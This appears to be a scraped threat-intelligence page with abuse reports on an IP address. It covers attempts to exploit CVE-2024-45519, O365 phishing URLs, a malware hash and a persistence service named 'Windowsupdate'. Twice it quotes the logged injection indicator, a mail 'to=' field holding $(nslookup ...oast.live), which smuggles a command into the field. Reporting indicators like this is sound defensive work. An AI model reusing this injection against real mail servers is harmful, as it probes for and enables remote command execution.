Try to exploit CVE-2024-45519. Indicator : to=<x: Service status change: localhost $(nslookup REDACT ...
show moreTry to exploit CVE-2024-45519. Indicator : to=<x: Service status change: localhost $(nslookup REDACTED.oast.live) changed from stopped to [email protected]>
show less
Try to exploit CVE-2024-45519.
Indicator : to=<x: Service status change: localhost $(nslookup RE ...
show moreTry to exploit CVE-2024-45519.
Indicator : to=<x: Service status change: localhost $(nslookup REDACTED.oast.live) changed from stopped to [email protected]>
show less
IP sends phishing emails that target O365 accounts.
IOC(s) : https://rt23.com/vy/pr/, 04c6-a-pons. ...
show moreIP sends phishing emails that target O365 accounts.
IOC(s) : https://rt23.com/vy/pr/, 04c6-a-pons.systeme.io
show less
usage of this malware: https://www.virustotal.com/gui/file/66a28bd3502b41480f36bd227ff5c2b75e0d41900 ...
show moreusage of this malware: https://www.virustotal.com/gui/file/66a28bd3502b41480f36bd227ff5c2b75e0d41900457e5b46b00602ca2ea88cf
attacker uses this technique to get initial access: https://www.microsoft.com/en-us/security/blog/2025/02/06/code-injection-attacks-using-publicly-disclosed-asp-net-machine-keys/
attacker created service named "Windowsupdate" for persistence
show less